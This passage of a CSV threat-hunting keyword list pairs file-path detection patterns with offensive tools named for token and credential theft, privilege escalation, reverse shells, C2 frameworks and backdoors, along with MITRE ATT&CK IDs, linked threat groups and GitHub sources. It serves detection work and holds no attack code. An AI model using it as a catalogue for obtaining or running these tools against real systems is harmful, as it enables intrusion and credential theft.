"*/tmp/geckodriver.tar.gz*",".{0,1000}\/tmp\/geckodriver\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11972" "*/tmp/gitleaks*",".{0,1000}\/tmp\/gitleaks.{0,1000}","offensive_tool_keyword","thoth","Automate 
recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11973" "*/tmp/gtfokey.pub*",".{0,1000}\/tmp\/gtfokey\.pub.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11974" "*/tmp/host.ghost*",".{0,1000}\/tmp\/host\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","11975" "*/tmp/kerberos_tickets*",".{0,1000}\/tmp\/kerberos_tickets.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","11976" "*/tmp/libpwn.c*",".{0,1000}\/tmp\/libpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11977" "*/tmp/libpwn.so*",".{0,1000}\/tmp\/libpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege 
escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11978" "*/tmp/mac.ghost*",".{0,1000}\/tmp\/mac\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","11979" "*/tmp/metadata/na.elf*",".{0,1000}\/tmp\/metadata\/na\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","11980" "*/tmp/metasploit_install*",".{0,1000}\/tmp\/metasploit_install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","11981" "*/tmp/p0f.log*",".{0,1000}\/tmp\/p0f\.log.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 
- TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","#logfile #linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11982" "*/tmp/passwd.bak*",".{0,1000}\/tmp\/passwd\.bak.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","11983" "*/tmp/passwords.txt*",".{0,1000}\/tmp\/passwords\.txt.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","11984" "*/tmp/payload.bin*",".{0,1000}\/tmp\/payload\.bin.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#linux","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","11985" "*/tmp/payload.ps1*",".{0,1000}\/tmp\/payload\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","11986" 
"*/tmp/payload.txt*",".{0,1000}\/tmp\/payload\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#linux","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","11987" "*/tmp/Phishing/documentation.pdf.zip*",".{0,1000}\/tmp\/Phishing\/documentation\.pdf\.zip.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#linux","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","11988" "*/tmp/r00tshell*",".{0,1000}\/tmp\/r00tshell.{0,1000}","offensive_tool_keyword","exploit-db","privilege escalation exploit pattern on https://www.exploit-db.com/exploits/38576","T1068 - T1548 - T1055 - T1088 - T1134 - T1221 - T1543 - T1547 - T1574","TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://www.exploit-db.com/exploits/38576","1","0","#linux","linux privesc","10","10","N/A","N/A","N/A","N/A","11989" "*/tmp/resolution.txt*server.sh*",".{0,1000}\/tmp\/resolution\.txt.{0,1000}server\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - 
TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","11990" "*/tmp/revshell.exe*",".{0,1000}\/tmp\/revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#linux","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","11991" "*/tmp/scanrepo.tar.gz*",".{0,1000}\/tmp\/scanrepo\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11992" "*/tmp/shellcode.bin*",".{0,1000}\/tmp\/shellcode\.bin.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#linux","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","11993" "*/tmp/sish.log*",".{0,1000}\/tmp\/sish\.log.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#linux","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","11994" "*/tmp/smb_auth_temp_*.txt*",".{0,1000}\/tmp\/smb_auth_temp_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","#linux","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11995" "*/tmp/socks5.sh*",".{0,1000}\/tmp\/socks5\.sh.{0,1000}","offensive_tool_keyword","SystemBC","multifunctional malware mostly known as a socks proxy - used by various ransomware groups with additional functionalities","T1090 - T1095 - T1571 - T1071 - T1105 - T1021 - T1043","TA0011 - TA0010 - TA0002","N/A","N/A","Malware","https://github.com/Leeon123/Python3-botnet","1","0","#linux","N/A","10","1","36","25","2020-01-21T10:33:34Z","2019-01-15T14:02:21Z","11996" "*/tmp/tmpfolder/pingoor.c*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.c.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","12000"
"*/tmp/tmpfolder/pingoor.h*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.h.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","12001" "*/tmp/traitor.so*",".{0,1000}\/tmp\/traitor\.so.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12002" "*/tmp/truffleHog.tar.gz*",".{0,1000}\/tmp\/truffleHog\.tar\.gz.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","12003" "*/tmp/tshd*",".{0,1000}\/tmp\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","12004" "*/tmp/vt-post-*.txt*",".{0,1000}\/tmp\/vt\-post\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","12005" "*/tmp/vt-results-*.txt*",".{0,1000}\/tmp\/vt\-results\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","12006" "*/tmp/wordlist.txt*",".{0,1000}\/tmp\/wordlist\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","#linux","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","12007" "*/tn3270-screen.nse*",".{0,1000}\/tn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12008" "*/Token%20grabber.dll*",".{0,1000}\/Token\%20grabber\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","12009" "*/TokenAssignor.exe*",".{0,1000}\/TokenAssignor\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12010" "*/TokenDump.exe*",".{0,1000}\/TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","1","N/A","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12011" "*/TokenFinder.git*",".{0,1000}\/TokenFinder\.git.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","1","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","12012" 
"*/TokenFinder.py*",".{0,1000}\/TokenFinder\.py.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","1","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","12013" "*/Token-Impersonation.git*",".{0,1000}\/Token\-Impersonation\.git.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","1","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","12014" "*/Token-Impersonation.ps1*",".{0,1000}\/Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","1","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","12015" "*/TokenPlayer.git*",".{0,1000}\/TokenPlayer\.git.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","12016" "*/TokenStealer.git*",".{0,1000}\/TokenStealer\.git.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential 
Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","12017" "*/TokenStealing*",".{0,1000}\/TokenStealing.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12018" "*/TokenStealing.exe*",".{0,1000}\/TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12019" "*/TokenStomp.exe*",".{0,1000}\/TokenStomp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12020" "*/TokenStomp.exe*",".{0,1000}\/TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12021" "*/TokenStripBOF*",".{0,1000}\/TokenStripBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum 
- REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","12022" "*/TokenTactics.git*",".{0,1000}\/TokenTactics\.git.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","12023" "*/TokenTacticsV2.git*",".{0,1000}\/TokenTacticsV2\.git.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","12024" "*/TokenUniverse.git*",".{0,1000}\/TokenUniverse\.git.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","12025" "*/TokenUniverse.zip*",".{0,1000}\/TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential 
Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","12026" "*/Tokenvator/*",".{0,1000}\/Tokenvator\/.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","12027" "*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","12028" "*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","12029" "*/tools/BeaconTool/*",".{0,1000}\/tools\/BeaconTool\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","12030" "*/tools/DHCP.py*",".{0,1000}\/tools\/DHCP\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#linux","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","12031" "*/tools/gs-pipe *",".{0,1000}\/tools\/gs\-pipe\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
